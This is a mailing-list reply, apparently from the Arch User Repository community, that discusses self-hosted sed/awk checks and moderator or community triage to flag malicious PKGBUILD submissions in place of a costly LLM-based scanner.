On 5/29/26 2:56 AM, [email protected] wrote:
Pretty good idea you got there, however there's a legitimate concern on
where and how you are going to be running it.
For instance, which model to use? Gemini? Deepseek? Open-sourced ChatGPT?
Secondly, where are we gonna get the money for that? Donations are
enough for everything up to this point, but running an LLM will shoot
costs through the roof.
I suggest either distilling or training a separate algorithm (**NOT** a
language model) to keep costs low, as it won't be a generalist and we
won't be wasting RAM on storing parameters about medicine in a software
project.
That's a really good idea, and practical concerns. But, since PKGBUILD
files are just bash scripts and we could probably suss-out a fairly
rigorous scan process given the brain-trust on this list, it may not
require a frontier-model LLM or its cost.
Why not come up with a set of criteria, and turn those into sed, awk,
etc. tests to capture suspicious submissions that could simply be
self-hosted and run for each new account/submission. All a LLM is going
to do is take prompts that tell it to go put those things together and
then run it. (give or take). Some prompt wizard could go see what the
models will spit out when told to go generate an efficient set of
scripts to test the criteria, and see what it does.
A self-hosted tool that is 95% as good as a LLM with zero cost, that
scales, seems like the best of both worlds.
The second part of that is moderator or trusted user triage of any
positives identified. That has to scale as well (hopefully not too
much), but we don't want to take the moderators away from the job they
do otherwise. Putting that out to the community in StackOverflow
"Queues" type format may be an option to get member involvement and that
could be open for users with X number of years/months without a lot of
trouble.
I don't mind helping either from a queue sense or tool standpoint, but
what we need to do is start gathering together the criteria that needs
to be checked, etc.. Starting with the postmortem from the recent
attempts. I don't know how they would be integrated to run at the AUR
level, but I can turn criteria into testable script fragments to help.
Something similar could be done for AUR account/package ownership
changes, adoptions, etc...
Focusing on the actual package-problem and eliminating the account
identity baggage is a good idea, and a homegrown solution never a bad
choice.
--
David C. Rankin, J.D.,P.E.